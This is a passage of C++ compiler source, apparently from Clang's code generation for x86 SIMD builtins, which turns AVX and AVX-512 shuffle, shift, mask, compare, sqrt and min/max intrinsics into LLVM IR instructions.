case X86::BI__builtin_ia32_shuf_i64x2_256:
case X86::BI__builtin_ia32_shuf_f32x4:
case X86::BI__builtin_ia32_shuf_f64x2:
case X86::BI__builtin_ia32_shuf_i32x4:
case X86::BI__builtin_ia32_shuf_i64x2: {
unsigned Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
auto *Ty = cast<llvm::FixedVectorType>(Ops[0]->getType());
unsigned NumElts = Ty->getNumElements();
unsigned NumLanes = Ty->getPrimitiveSizeInBits() == 512 ? 4 : 2;
unsigned NumLaneElts = NumElts / NumLanes;
int Indices[16];
for (unsigned l = 0; l != NumElts; l += NumLaneElts) {
unsigned Index = (Imm % NumLanes) * NumLaneElts;
Imm /= NumLanes; // Discard the bits we just used.
if (l >= (NumElts / 2))
Index += NumElts; // Switch to other source.
for (unsigned i = 0; i != NumLaneElts; ++i) {
Indices[l + i] = Index + i;
}
}
return Builder.CreateShuffleVector(Ops[0], Ops[1],
makeArrayRef(Indices, NumElts),
"shuf");
}
case X86::BI__builtin_ia32_vperm2f128_pd256:
case X86::BI__builtin_ia32_vperm2f128_ps256:
case X86::BI__builtin_ia32_vperm2f128_si256:
case X86::BI__builtin_ia32_permti256: {
unsigned Imm = cast<llvm::ConstantInt>(Ops[2])->getZExtValue();
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
// This takes a very simple approach since there are two lanes and a
// shuffle can have 2 inputs. So we reserve the first input for the first
// lane and the second input for the second lane. This may result in
// duplicate sources, but this can be dealt with in the backend.
Value *OutOps[2];
int Indices[8];
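// For each result lane l, Imm bit (l*4 + 3) zeroes the lane, bit
// (l*4 + 1) selects the second source, and bit (l*4) selects the high
// half of the chosen source.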
for (unsigned l = 0; l != 2; ++l) {
// Determine the source for this lane.
if (Imm & (1 << ((l * 4) + 3)))
OutOps[l] = llvm::ConstantAggregateZero::get(Ops[0]->getType());
else if (Imm & (1 << ((l * 4) + 1)))
OutOps[l] = Ops[1];
else
OutOps[l] = Ops[0];
for (unsigned i = 0; i != NumElts/2; ++i) {
// Start with ith element of the source for this lane.
unsigned Idx = (l * NumElts) + i;
// If bit 0 of the immediate half is set, switch to the high half of
// the source.
if (Imm & (1 << (l * 4)))
Idx += NumElts/2;
Indices[(l * (NumElts/2)) + i] = Idx;
}
}
return Builder.CreateShuffleVector(OutOps[0], OutOps[1],
makeArrayRef(Indices, NumElts),
"vperm");
}
case X86::BI__builtin_ia32_pslldqi128_byteshift:
case X86::BI__builtin_ia32_pslldqi256_byteshift:
case X86::BI__builtin_ia32_pslldqi512_byteshift: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
auto *ResultType = cast<llvm::FixedVectorType>(Ops[0]->getType());
// Builtin type is vXi64 so multiply by 8 to get bytes.
unsigned NumElts = ResultType->getNumElements() * 8;
// If pslldq is shifting the vector more than 15 bytes, emit zero.
if (ShiftVal >= 16)
return llvm::Constant::getNullValue(ResultType);
int Indices[64];
// 256/512-bit pslldq operates on 128-bit lanes, so handle each lane separately.
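// e.g. ShiftVal = 3: in each lane, bytes 0..2 become zero and byte i
// takes the lane's byte i-3.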
for (unsigned l = 0; l != NumElts; l += 16) {
for (unsigned i = 0; i != 16; ++i) {
unsigned Idx = NumElts + i - ShiftVal;
if (Idx < NumElts) Idx -= NumElts - 16; // end of lane, switch operand.
Indices[l + i] = Idx + l;
}
}
auto *VecTy = llvm::FixedVectorType::get(Int8Ty, NumElts);
Value *Cast = Builder.CreateBitCast(Ops[0], VecTy, "cast");
Value *Zero = llvm::Constant::getNullValue(VecTy);
Value *SV = Builder.CreateShuffleVector(Zero, Cast,
makeArrayRef(Indices, NumElts),
"pslldq");
return Builder.CreateBitCast(SV, Ops[0]->getType(), "cast");
}
case X86::BI__builtin_ia32_psrldqi128_byteshift:
case X86::BI__builtin_ia32_psrldqi256_byteshift:
case X86::BI__builtin_ia32_psrldqi512_byteshift: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
auto *ResultType = cast<llvm::FixedVectorType>(Ops[0]->getType());
// Builtin type is vXi64 so multiply by 8 to get bytes.
unsigned NumElts = ResultType->getNumElements() * 8;
// If psrldq is shifting the vector more than 15 bytes, emit zero.
if (ShiftVal >= 16)
return llvm::Constant::getNullValue(ResultType);
int Indices[64];
// 256/512-bit psrldq operates on 128-bit lanes, so handle each lane separately.
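// e.g. ShiftVal = 3: in each lane, byte i takes the lane's byte i+3 and
// the top three bytes become zero.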
for (unsigned l = 0; l != NumElts; l += 16) {
for (unsigned i = 0; i != 16; ++i) {
unsigned Idx = i + ShiftVal;
if (Idx >= 16) Idx += NumElts - 16; // end of lane, switch operand.
Indices[l + i] = Idx + l;
}
}
auto *VecTy = llvm::FixedVectorType::get(Int8Ty, NumElts);
Value *Cast = Builder.CreateBitCast(Ops[0], VecTy, "cast");
Value *Zero = llvm::Constant::getNullValue(VecTy);
Value *SV = Builder.CreateShuffleVector(Cast, Zero,
makeArrayRef(Indices, NumElts),
"psrldq");
return Builder.CreateBitCast(SV, ResultType, "cast");
}
case X86::BI__builtin_ia32_kshiftliqi:
case X86::BI__builtin_ia32_kshiftlihi:
case X86::BI__builtin_ia32_kshiftlisi:
case X86::BI__builtin_ia32_kshiftlidi: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
if (ShiftVal >= NumElts)
return llvm::Constant::getNullValue(Ops[0]->getType());
Value *In = getMaskVecValue(*this, Ops[0], NumElts);
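// Shift as a shuffle of <Zero, In>: result bit i is In[i - ShiftVal], or
// zero when i < ShiftVal.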
int Indices[64];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = NumElts + i - ShiftVal;
Value *Zero = llvm::Constant::getNullValue(In->getType());
Value *SV = Builder.CreateShuffleVector(Zero, In,
makeArrayRef(Indices, NumElts),
"kshiftl");
return Builder.CreateBitCast(SV, Ops[0]->getType());
}
case X86::BI__builtin_ia32_kshiftriqi:
case X86::BI__builtin_ia32_kshiftrihi:
case X86::BI__builtin_ia32_kshiftrisi:
case X86::BI__builtin_ia32_kshiftridi: {
unsigned ShiftVal = cast<llvm::ConstantInt>(Ops[1])->getZExtValue() & 0xff;
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
if (ShiftVal >= NumElts)
return llvm::Constant::getNullValue(Ops[0]->getType());
Value *In = getMaskVecValue(*this, Ops[0], NumElts);
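// Shift as a shuffle of <In, Zero>: result bit i is In[i + ShiftVal], or
// zero once i + ShiftVal runs past the mask width.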
int Indices[64];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i + ShiftVal;
Value *Zero = llvm::Constant::getNullValue(In->getType());
Value *SV = Builder.CreateShuffleVector(In, Zero,
makeArrayRef(Indices, NumElts),
"kshiftr");
return Builder.CreateBitCast(SV, Ops[0]->getType());
}
case X86::BI__builtin_ia32_movnti:
case X86::BI__builtin_ia32_movnti64:
case X86::BI__builtin_ia32_movntsd:
case X86::BI__builtin_ia32_movntss: {
llvm::MDNode *Node = llvm::MDNode::get(
getLLVMContext(), llvm::ConstantAsMetadata::get(Builder.getInt32(1)));
Value *Ptr = Ops[0];
Value *Src = Ops[1];
// Extract the 0th element of the source vector.
if (BuiltinID == X86::BI__builtin_ia32_movntsd ||
BuiltinID == X86::BI__builtin_ia32_movntss)
Src = Builder.CreateExtractElement(Src, (uint64_t)0, "extract");
// Convert the type of the pointer to a pointer to the stored type.
Value *BC = Builder.CreateBitCast(
Ptr, llvm::PointerType::getUnqual(Src->getType()), "cast");
// Unaligned nontemporal store of the scalar value.
StoreInst *SI = Builder.CreateDefaultAlignedStore(Src, BC);
SI->setMetadata(CGM.getModule().getMDKindID("nontemporal"), Node);
SI->setAlignment(llvm::Align(1));
return SI;
}
// Rotate is a special case of funnel shift: the first two arguments are the same.
case X86::BI__builtin_ia32_vprotb:
case X86::BI__builtin_ia32_vprotw:
case X86::BI__builtin_ia32_vprotd:
case X86::BI__builtin_ia32_vprotq:
case X86::BI__builtin_ia32_vprotbi:
case X86::BI__builtin_ia32_vprotwi:
case X86::BI__builtin_ia32_vprotdi:
case X86::BI__builtin_ia32_vprotqi:
case X86::BI__builtin_ia32_prold128:
case X86::BI__builtin_ia32_prold256:
case X86::BI__builtin_ia32_prold512:
case X86::BI__builtin_ia32_prolq128:
case X86::BI__builtin_ia32_prolq256:
case X86::BI__builtin_ia32_prolq512:
case X86::BI__builtin_ia32_prolvd128:
case X86::BI__builtin_ia32_prolvd256:
case X86::BI__builtin_ia32_prolvd512:
case X86::BI__builtin_ia32_prolvq128:
case X86::BI__builtin_ia32_prolvq256:
case X86::BI__builtin_ia32_prolvq512:
return EmitX86FunnelShift(*this, Ops[0], Ops[0], Ops[1], false);
case X86::BI__builtin_ia32_prord128:
case X86::BI__builtin_ia32_prord256:
case X86::BI__builtin_ia32_prord512:
case X86::BI__builtin_ia32_prorq128:
case X86::BI__builtin_ia32_prorq256:
case X86::BI__builtin_ia32_prorq512:
case X86::BI__builtin_ia32_prorvd128:
case X86::BI__builtin_ia32_prorvd256:
case X86::BI__builtin_ia32_prorvd512:
case X86::BI__builtin_ia32_prorvq128:
case X86::BI__builtin_ia32_prorvq256:
case X86::BI__builtin_ia32_prorvq512:
return EmitX86FunnelShift(*this, Ops[0], Ops[0], Ops[1], true);
case X86::BI__builtin_ia32_selectb_128:
case X86::BI__builtin_ia32_selectb_256:
case X86::BI__builtin_ia32_selectb_512:
case X86::BI__builtin_ia32_selectw_128:
case X86::BI__builtin_ia32_selectw_256:
case X86::BI__builtin_ia32_selectw_512:
case X86::BI__builtin_ia32_selectd_128:
case X86::BI__builtin_ia32_selectd_256:
case X86::BI__builtin_ia32_selectd_512:
case X86::BI__builtin_ia32_selectq_128:
case X86::BI__builtin_ia32_selectq_256:
case X86::BI__builtin_ia32_selectq_512:
case X86::BI__builtin_ia32_selectph_128:
case X86::BI__builtin_ia32_selectph_256:
case X86::BI__builtin_ia32_selectph_512:
case X86::BI__builtin_ia32_selectps_128:
case X86::BI__builtin_ia32_selectps_256:
case X86::BI__builtin_ia32_selectps_512:
case X86::BI__builtin_ia32_selectpd_128:
case X86::BI__builtin_ia32_selectpd_256:
case X86::BI__builtin_ia32_selectpd_512:
return EmitX86Select(*this, Ops[0], Ops[1], Ops[2]);
case X86::BI__builtin_ia32_selectsh_128:
case X86::BI__builtin_ia32_selectss_128:
case X86::BI__builtin_ia32_selectsd_128: {
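// Select on element 0 only; the remaining elements of Ops[1] pass through
// unchanged.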
Value *A = Builder.CreateExtractElement(Ops[1], (uint64_t)0);
Value *B = Builder.CreateExtractElement(Ops[2], (uint64_t)0);
A = EmitX86ScalarSelect(*this, Ops[0], A, B);
return Builder.CreateInsertElement(Ops[1], A, (uint64_t)0);
}
case X86::BI__builtin_ia32_cmpb128_mask:
case X86::BI__builtin_ia32_cmpb256_mask:
case X86::BI__builtin_ia32_cmpb512_mask:
case X86::BI__builtin_ia32_cmpw128_mask:
case X86::BI__builtin_ia32_cmpw256_mask:
case X86::BI__builtin_ia32_cmpw512_mask:
case X86::BI__builtin_ia32_cmpd128_mask:
case X86::BI__builtin_ia32_cmpd256_mask:
case X86::BI__builtin_ia32_cmpd512_mask:
case X86::BI__builtin_ia32_cmpq128_mask:
case X86::BI__builtin_ia32_cmpq256_mask:
case X86::BI__builtin_ia32_cmpq512_mask: {
unsigned CC = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x7;
return EmitX86MaskedCompare(*this, CC, true, Ops);
}
case X86::BI__builtin_ia32_ucmpb128_mask:
case X86::BI__builtin_ia32_ucmpb256_mask:
case X86::BI__builtin_ia32_ucmpb512_mask:
case X86::BI__builtin_ia32_ucmpw128_mask:
case X86::BI__builtin_ia32_ucmpw256_mask:
case X86::BI__builtin_ia32_ucmpw512_mask:
case X86::BI__builtin_ia32_ucmpd128_mask:
case X86::BI__builtin_ia32_ucmpd256_mask:
case X86::BI__builtin_ia32_ucmpd512_mask:
case X86::BI__builtin_ia32_ucmpq128_mask:
case X86::BI__builtin_ia32_ucmpq256_mask:
case X86::BI__builtin_ia32_ucmpq512_mask: {
unsigned CC = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x7;
return EmitX86MaskedCompare(*this, CC, false, Ops);
}
case X86::BI__builtin_ia32_vpcomb:
case X86::BI__builtin_ia32_vpcomw:
case X86::BI__builtin_ia32_vpcomd:
case X86::BI__builtin_ia32_vpcomq:
return EmitX86vpcom(*this, Ops, true);
case X86::BI__builtin_ia32_vpcomub:
case X86::BI__builtin_ia32_vpcomuw:
case X86::BI__builtin_ia32_vpcomud:
case X86::BI__builtin_ia32_vpcomuq:
return EmitX86vpcom(*this, Ops, false);
case X86::BI__builtin_ia32_kortestcqi:
case X86::BI__builtin_ia32_kortestchi:
case X86::BI__builtin_ia32_kortestcsi:
case X86::BI__builtin_ia32_kortestcdi: {
Value *Or = EmitX86MaskLogic(*this, Instruction::Or, Ops);
Value *C = llvm::Constant::getAllOnesValue(Ops[0]->getType());
Value *Cmp = Builder.CreateICmpEQ(Or, C);
return Builder.CreateZExt(Cmp, ConvertType(E->getType()));
}
case X86::BI__builtin_ia32_kortestzqi:
case X86::BI__builtin_ia32_kortestzhi:
case X86::BI__builtin_ia32_kortestzsi:
case X86::BI__builtin_ia32_kortestzdi: {
Value *Or = EmitX86MaskLogic(*this, Instruction::Or, Ops);
Value *C = llvm::Constant::getNullValue(Ops[0]->getType());
Value *Cmp = Builder.CreateICmpEQ(Or, C);
return Builder.CreateZExt(Cmp, ConvertType(E->getType()));
}
case X86::BI__builtin_ia32_ktestcqi:
case X86::BI__builtin_ia32_ktestzqi:
case X86::BI__builtin_ia32_ktestchi:
case X86::BI__builtin_ia32_ktestzhi:
case X86::BI__builtin_ia32_ktestcsi:
case X86::BI__builtin_ia32_ktestzsi:
case X86::BI__builtin_ia32_ktestcdi:
case X86::BI__builtin_ia32_ktestzdi: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_ktestcqi:
IID = Intrinsic::x86_avx512_ktestc_b;
break;
case X86::BI__builtin_ia32_ktestzqi:
IID = Intrinsic::x86_avx512_ktestz_b;
break;
case X86::BI__builtin_ia32_ktestchi:
IID = Intrinsic::x86_avx512_ktestc_w;
break;
case X86::BI__builtin_ia32_ktestzhi:
IID = Intrinsic::x86_avx512_ktestz_w;
break;
case X86::BI__builtin_ia32_ktestcsi:
IID = Intrinsic::x86_avx512_ktestc_d;
break;
case X86::BI__builtin_ia32_ktestzsi:
IID = Intrinsic::x86_avx512_ktestz_d;
break;
case X86::BI__builtin_ia32_ktestcdi:
IID = Intrinsic::x86_avx512_ktestc_q;
break;
case X86::BI__builtin_ia32_ktestzdi:
IID = Intrinsic::x86_avx512_ktestz_q;
break;
}
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(*this, Ops[0], NumElts);
Value *RHS = getMaskVecValue(*this, Ops[1], NumElts);
Function *Intr = CGM.getIntrinsic(IID);
return Builder.CreateCall(Intr, {LHS, RHS});
}
case X86::BI__builtin_ia32_kaddqi:
case X86::BI__builtin_ia32_kaddhi:
case X86::BI__builtin_ia32_kaddsi:
case X86::BI__builtin_ia32_kadddi: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_kaddqi:
IID = Intrinsic::x86_avx512_kadd_b;
break;
case X86::BI__builtin_ia32_kaddhi:
IID = Intrinsic::x86_avx512_kadd_w;
break;
case X86::BI__builtin_ia32_kaddsi:
IID = Intrinsic::x86_avx512_kadd_d;
break;
case X86::BI__builtin_ia32_kadddi:
IID = Intrinsic::x86_avx512_kadd_q;
break;
}
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(*this, Ops[0], NumElts);
Value *RHS = getMaskVecValue(*this, Ops[1], NumElts);
Function *Intr = CGM.getIntrinsic(IID);
Value *Res = Builder.CreateCall(Intr, {LHS, RHS});
return Builder.CreateBitCast(Res, Ops[0]->getType());
}
case X86::BI__builtin_ia32_kandqi:
case X86::BI__builtin_ia32_kandhi:
case X86::BI__builtin_ia32_kandsi:
case X86::BI__builtin_ia32_kanddi:
return EmitX86MaskLogic(*this, Instruction::And, Ops);
case X86::BI__builtin_ia32_kandnqi:
case X86::BI__builtin_ia32_kandnhi:
case X86::BI__builtin_ia32_kandnsi:
case X86::BI__builtin_ia32_kandndi:
return EmitX86MaskLogic(*this, Instruction::And, Ops, true);
case X86::BI__builtin_ia32_korqi:
case X86::BI__builtin_ia32_korhi:
case X86::BI__builtin_ia32_korsi:
case X86::BI__builtin_ia32_kordi:
return EmitX86MaskLogic(*this, Instruction::Or, Ops);
case X86::BI__builtin_ia32_kxnorqi:
case X86::BI__builtin_ia32_kxnorhi:
case X86::BI__builtin_ia32_kxnorsi:
case X86::BI__builtin_ia32_kxnordi:
return EmitX86MaskLogic(*this, Instruction::Xor, Ops, true);
case X86::BI__builtin_ia32_kxorqi:
case X86::BI__builtin_ia32_kxorhi:
case X86::BI__builtin_ia32_kxorsi:
case X86::BI__builtin_ia32_kxordi:
return EmitX86MaskLogic(*this, Instruction::Xor, Ops);
case X86::BI__builtin_ia32_knotqi:
case X86::BI__builtin_ia32_knothi:
case X86::BI__builtin_ia32_knotsi:
case X86::BI__builtin_ia32_knotdi: {
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *Res = getMaskVecValue(*this, Ops[0], NumElts);
return Builder.CreateBitCast(Builder.CreateNot(Res),
Ops[0]->getType());
}
case X86::BI__builtin_ia32_kmovb:
case X86::BI__builtin_ia32_kmovw:
case X86::BI__builtin_ia32_kmovd:
case X86::BI__builtin_ia32_kmovq: {
// Bitcast to vXi1 type and then back to integer. This gets the mask
// register type into the IR, but might be optimized out depending on
// what's around it.
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *Res = getMaskVecValue(*this, Ops[0], NumElts);
return Builder.CreateBitCast(Res, Ops[0]->getType());
}
case X86::BI__builtin_ia32_kunpckdi:
case X86::BI__builtin_ia32_kunpcksi:
case X86::BI__builtin_ia32_kunpckhi: {
unsigned NumElts = Ops[0]->getType()->getIntegerBitWidth();
Value *LHS = getMaskVecValue(*this, Ops[0], NumElts);
Value *RHS = getMaskVecValue(*this, Ops[1], NumElts);
int Indices[64];
for (unsigned i = 0; i != NumElts; ++i)
Indices[i] = i;
// First extract half of each vector. This gives better codegen than
// doing it in a single shuffle.
LHS = Builder.CreateShuffleVector(LHS, LHS,
makeArrayRef(Indices, NumElts / 2));
RHS = Builder.CreateShuffleVector(RHS, RHS,
makeArrayRef(Indices, NumElts / 2));
// Concat the vectors.
// NOTE: Operands are swapped to match the intrinsic definition.
Value *Res = Builder.CreateShuffleVector(RHS, LHS,
makeArrayRef(Indices, NumElts));
return Builder.CreateBitCast(Res, Ops[0]->getType());
}
case X86::BI__builtin_ia32_vplzcntd_128:
case X86::BI__builtin_ia32_vplzcntd_256:
case X86::BI__builtin_ia32_vplzcntd_512:
case X86::BI__builtin_ia32_vplzcntq_128:
case X86::BI__builtin_ia32_vplzcntq_256:
case X86::BI__builtin_ia32_vplzcntq_512: {
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0],Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_sqrtss:
case X86::BI__builtin_ia32_sqrtsd: {
Value *A = Builder.CreateExtractElement(Ops[0], (uint64_t)0);
Function *F;
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt,
A->getType());
A = Builder.CreateConstrainedFPCall(F, {A});
} else {
F = CGM.getIntrinsic(Intrinsic::sqrt, A->getType());
A = Builder.CreateCall(F, {A});
}
return Builder.CreateInsertElement(Ops[0], A, (uint64_t)0);
}
case X86::BI__builtin_ia32_sqrtsh_round_mask:
case X86::BI__builtin_ia32_sqrtsd_round_mask:
case X86::BI__builtin_ia32_sqrtss_round_mask: {
unsigned CC = cast<llvm::ConstantInt>(Ops[4])->getZExtValue();
// Lower to a plain sqrt only if the rounding mode is 4 (CUR_DIRECTION);
// otherwise keep the target-specific intrinsic.
if (CC != 4) {
Intrinsic::ID IID;
switch (BuiltinID) {
default:
llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_sqrtsh_round_mask:
IID = Intrinsic::x86_avx512fp16_mask_sqrt_sh;
break;
case X86::BI__builtin_ia32_sqrtsd_round_mask:
IID = Intrinsic::x86_avx512_mask_sqrt_sd;
break;
case X86::BI__builtin_ia32_sqrtss_round_mask:
IID = Intrinsic::x86_avx512_mask_sqrt_ss;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
}
Value *A = Builder.CreateExtractElement(Ops[1], (uint64_t)0);
Function *F;
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt,
A->getType());
A = Builder.CreateConstrainedFPCall(F, A);
} else {
F = CGM.getIntrinsic(Intrinsic::sqrt, A->getType());
A = Builder.CreateCall(F, A);
}
Value *Src = Builder.CreateExtractElement(Ops[2], (uint64_t)0);
A = EmitX86ScalarSelect(*this, Ops[3], A, Src);
return Builder.CreateInsertElement(Ops[0], A, (uint64_t)0);
}
case X86::BI__builtin_ia32_sqrtpd256:
case X86::BI__builtin_ia32_sqrtpd:
case X86::BI__builtin_ia32_sqrtps256:
case X86::BI__builtin_ia32_sqrtps:
case X86::BI__builtin_ia32_sqrtph256:
case X86::BI__builtin_ia32_sqrtph:
case X86::BI__builtin_ia32_sqrtph512:
case X86::BI__builtin_ia32_sqrtps512:
case X86::BI__builtin_ia32_sqrtpd512: {
if (Ops.size() == 2) {
unsigned CC = cast<llvm::ConstantInt>(Ops[1])->getZExtValue();
// Lower to a plain sqrt only if the rounding mode is 4 (CUR_DIRECTION);
// otherwise keep the target-specific intrinsic.
if (CC != 4) {
Intrinsic::ID IID;
switch (BuiltinID) {
default:
llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_sqrtph512:
IID = Intrinsic::x86_avx512fp16_sqrt_ph_512;
break;
case X86::BI__builtin_ia32_sqrtps512:
IID = Intrinsic::x86_avx512_sqrt_ps_512;
break;
case X86::BI__builtin_ia32_sqrtpd512:
IID = Intrinsic::x86_avx512_sqrt_pd_512;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
}
}
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_sqrt,
Ops[0]->getType());
return Builder.CreateConstrainedFPCall(F, Ops[0]);
} else {
Function *F = CGM.getIntrinsic(Intrinsic::sqrt, Ops[0]->getType());
return Builder.CreateCall(F, Ops[0]);
}
}
case X86::BI__builtin_ia32_pabsb128:
case X86::BI__builtin_ia32_pabsw128:
case X86::BI__builtin_ia32_pabsd128:
case X86::BI__builtin_ia32_pabsb256:
case X86::BI__builtin_ia32_pabsw256:
case X86::BI__builtin_ia32_pabsd256:
case X86::BI__builtin_ia32_pabsq128:
case X86::BI__builtin_ia32_pabsq256:
case X86::BI__builtin_ia32_pabsb512:
case X86::BI__builtin_ia32_pabsw512:
case X86::BI__builtin_ia32_pabsd512:
case X86::BI__builtin_ia32_pabsq512: {
Function *F = CGM.getIntrinsic(Intrinsic::abs, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0], Builder.getInt1(false)});
}
case X86::BI__builtin_ia32_pmaxsb128:
case X86::BI__builtin_ia32_pmaxsw128:
case X86::BI__builtin_ia32_pmaxsd128:
case X86::BI__builtin_ia32_pmaxsq128:
case X86::BI__builtin_ia32_pmaxsb256:
case X86::BI__builtin_ia32_pmaxsw256:
case X86::BI__builtin_ia32_pmaxsd256:
case X86::BI__builtin_ia32_pmaxsq256:
case X86::BI__builtin_ia32_pmaxsb512:
case X86::BI__builtin_ia32_pmaxsw512:
case X86::BI__builtin_ia32_pmaxsd512:
case X86::BI__builtin_ia32_pmaxsq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::smax);
case X86::BI__builtin_ia32_pmaxub128:
case X86::BI__builtin_ia32_pmaxuw128:
case X86::BI__builtin_ia32_pmaxud128:
case X86::BI__builtin_ia32_pmaxuq128:
case X86::BI__builtin_ia32_pmaxub256:
case X86::BI__builtin_ia32_pmaxuw256:
case X86::BI__builtin_ia32_pmaxud256:
case X86::BI__builtin_ia32_pmaxuq256:
case X86::BI__builtin_ia32_pmaxub512:
case X86::BI__builtin_ia32_pmaxuw512:
case X86::BI__builtin_ia32_pmaxud512:
case X86::BI__builtin_ia32_pmaxuq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::umax);
case X86::BI__builtin_ia32_pminsb128:
case X86::BI__builtin_ia32_pminsw128:
case X86::BI__builtin_ia32_pminsd128:
case X86::BI__builtin_ia32_pminsq128:
case X86::BI__builtin_ia32_pminsb256:
case X86::BI__builtin_ia32_pminsw256:
case X86::BI__builtin_ia32_pminsd256:
case X86::BI__builtin_ia32_pminsq256:
case X86::BI__builtin_ia32_pminsb512:
case X86::BI__builtin_ia32_pminsw512:
case X86::BI__builtin_ia32_pminsd512:
case X86::BI__builtin_ia32_pminsq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::smin);
case X86::BI__builtin_ia32_pminub128:
case X86::BI__builtin_ia32_pminuw128:
case X86::BI__builtin_ia32_pminud128:
case X86::BI__builtin_ia32_pminuq128:
case X86::BI__builtin_ia32_pminub256:
case X86::BI__builtin_ia32_pminuw256:
case X86::BI__builtin_ia32_pminud256:
case X86::BI__builtin_ia32_pminuq256:
case X86::BI__builtin_ia32_pminub512:
case X86::BI__builtin_ia32_pminuw512:
case X86::BI__builtin_ia32_pminud512:
case X86::BI__builtin_ia32_pminuq512:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::umin);
case X86::BI__builtin_ia32_pmuludq128:
case X86::BI__builtin_ia32_pmuludq256:
case X86::BI__builtin_ia32_pmuludq512:
return EmitX86Muldq(*this, /*IsSigned*/false, Ops);
case X86::BI__builtin_ia32_pmuldq128:
case X86::BI__builtin_ia32_pmuldq256:
case X86::BI__builtin_ia32_pmuldq512:
return EmitX86Muldq(*this, /*IsSigned*/true, Ops);
case X86::BI__builtin_ia32_pternlogd512_mask:
case X86::BI__builtin_ia32_pternlogq512_mask:
case X86::BI__builtin_ia32_pternlogd128_mask:
case X86::BI__builtin_ia32_pternlogd256_mask:
case X86::BI__builtin_ia32_pternlogq128_mask:
case X86::BI__builtin_ia32_pternlogq256_mask:
return EmitX86Ternlog(*this, /*ZeroMask*/false, Ops);
case X86::BI__builtin_ia32_pternlogd512_maskz:
case X86::BI__builtin_ia32_pternlogq512_maskz:
case X86::BI__builtin_ia32_pternlogd128_maskz:
case X86::BI__builtin_ia32_pternlogd256_maskz:
case X86::BI__builtin_ia32_pternlogq128_maskz:
case X86::BI__builtin_ia32_pternlogq256_maskz:
return EmitX86Ternlog(*this, /*ZeroMask*/true, Ops);
case X86::BI__builtin_ia32_vpshldd128:
case X86::BI__builtin_ia32_vpshldd256:
case X86::BI__builtin_ia32_vpshldd512:
case X86::BI__builtin_ia32_vpshldq128:
case X86::BI__builtin_ia32_vpshldq256:
case X86::BI__builtin_ia32_vpshldq512:
case X86::BI__builtin_ia32_vpshldw128:
case X86::BI__builtin_ia32_vpshldw256:
case X86::BI__builtin_ia32_vpshldw512:
return EmitX86FunnelShift(*this, Ops[0], Ops[1], Ops[2], false);
case X86::BI__builtin_ia32_vpshrdd128:
case X86::BI__builtin_ia32_vpshrdd256:
case X86::BI__builtin_ia32_vpshrdd512:
case X86::BI__builtin_ia32_vpshrdq128:
case X86::BI__builtin_ia32_vpshrdq256:
case X86::BI__builtin_ia32_vpshrdq512:
case X86::BI__builtin_ia32_vpshrdw128:
case X86::BI__builtin_ia32_vpshrdw256:
case X86::BI__builtin_ia32_vpshrdw512:
// Ops 0 and 1 are swapped.
return EmitX86FunnelShift(*this, Ops[1], Ops[0], Ops[2], true);
case X86::BI__builtin_ia32_vpshldvd128:
case X86::BI__builtin_ia32_vpshldvd256:
case X86::BI__builtin_ia32_vpshldvd512:
case X86::BI__builtin_ia32_vpshldvq128:
case X86::BI__builtin_ia32_vpshldvq256:
case X86::BI__builtin_ia32_vpshldvq512:
case X86::BI__builtin_ia32_vpshldvw128:
case X86::BI__builtin_ia32_vpshldvw256:
case X86::BI__builtin_ia32_vpshldvw512:
return EmitX86FunnelShift(*this, Ops[0], Ops[1], Ops[2], false);
case X86::BI__builtin_ia32_vpshrdvd128:
case X86::BI__builtin_ia32_vpshrdvd256:
case X86::BI__builtin_ia32_vpshrdvd512:
case X86::BI__builtin_ia32_vpshrdvq128:
case X86::BI__builtin_ia32_vpshrdvq256:
case X86::BI__builtin_ia32_vpshrdvq512:
case X86::BI__builtin_ia32_vpshrdvw128:
case X86::BI__builtin_ia32_vpshrdvw256:
case X86::BI__builtin_ia32_vpshrdvw512:
// Ops 0 and 1 are swapped.
return EmitX86FunnelShift(*this, Ops[1], Ops[0], Ops[2], true);
// Reductions
case X86::BI__builtin_ia32_reduce_add_d512:
case X86::BI__builtin_ia32_reduce_add_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_add, Ops[0]->getType());
